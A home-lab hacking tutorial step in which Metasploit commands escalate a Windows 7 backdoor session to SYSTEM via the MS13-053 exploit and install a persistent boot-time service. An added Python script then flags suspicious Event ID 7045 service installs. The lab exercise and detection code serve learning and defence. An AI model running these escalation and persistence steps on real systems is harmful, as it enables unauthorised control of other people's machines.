Hack your lab – Step 4 – Let’s get Admin!


When you have completed steps 1 to 3, we have a backdoor connection to a Windows 7 machine under a standard user account. Now it’s time to see if we can get admin by using an exploit.

Run these commands from the meterpreter console:

use post/multi/recon/local_exploit_suggester
show options
set session 1
run

This script checks on the Windows 7 machine which local privilege escalation methods could succeed, which is very handy for a fast intervention.

Let’s try this one:

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-053

use exploit/windows/local/ms13_053_schlamperei
set session 1
exploit

You’ll see that a new session has been created (verify this with sessions -l).

Connect to your new backdoor session with sessions -i <newID> and, once connected, type

getuid

If everything is correct, you will see that you are SYSTEM on the Windows 7 machine. Of course you want to keep this forever; for that you can use the command

run persistence

This will install a service which will connect when the system starts.
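
On the lab's Windows side, a new service installation is recorded by the Service Control Manager in the System log as Event ID 7045. The following is an added example, not part of the original post: it triages such records, assuming they were exported as dictionaries with the event's ServiceName, ImagePath, StartType and AccountName fields. The sample events, path patterns and function names are constructed for illustration.

```python
import re

# Constructed sample records shaped like Windows System-log Event ID 7045
# ("A service was installed in the system"). All values are made up.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Windows Update Helper",
     "ImagePath": r"C:\Users\bob\AppData\Local\Temp\aXbYcZ.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "Print Spooler Ext",
     "ImagePath": r'"C:\Program Files\Vendor\spoolext.exe" -k run',
     "StartType": "auto start", "AccountName": "LocalSystem"},
    {"EventID": 7045, "ServiceName": "updater",
     "ImagePath": r"%SystemRoot%\System32\cmd.exe /c C:\ProgramData\u.bat",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"EventID": 7036, "ServiceName": "BITS"},  # not an install event
]

# Heuristics below are assumptions; tune them for your own environment.
USER_WRITABLE = re.compile(r"\\(temp|appdata|users\\public|programdata)\\", re.I)
INTERPRETER = re.compile(r"\\(cmd|powershell|wscript|cscript|rundll32|mshta)\.exe\b", re.I)

def score_event(ev):
    """Return the reasons a 7045 event looks suspicious (empty list = none)."""
    if ev.get("EventID") != 7045:
        return []
    path = ev.get("ImagePath", "")
    reasons = []
    if USER_WRITABLE.search(path):
        reasons.append("path in user-writable directory")
    if INTERPRETER.search(path):
        reasons.append("service runs a script interpreter")
    # Boot persistence and SYSTEM context only add weight to an existing hit.
    if reasons and ev.get("StartType", "").lower() == "auto start":
        reasons.append("starts automatically at boot")
    if reasons and ev.get("AccountName", "").lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons

def triage(events):
    """Map service name -> reasons for every flagged install event."""
    return {ev["ServiceName"]: r for ev in events if (r := score_event(ev))}

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(f"{name}: {', '.join(reasons)}")
```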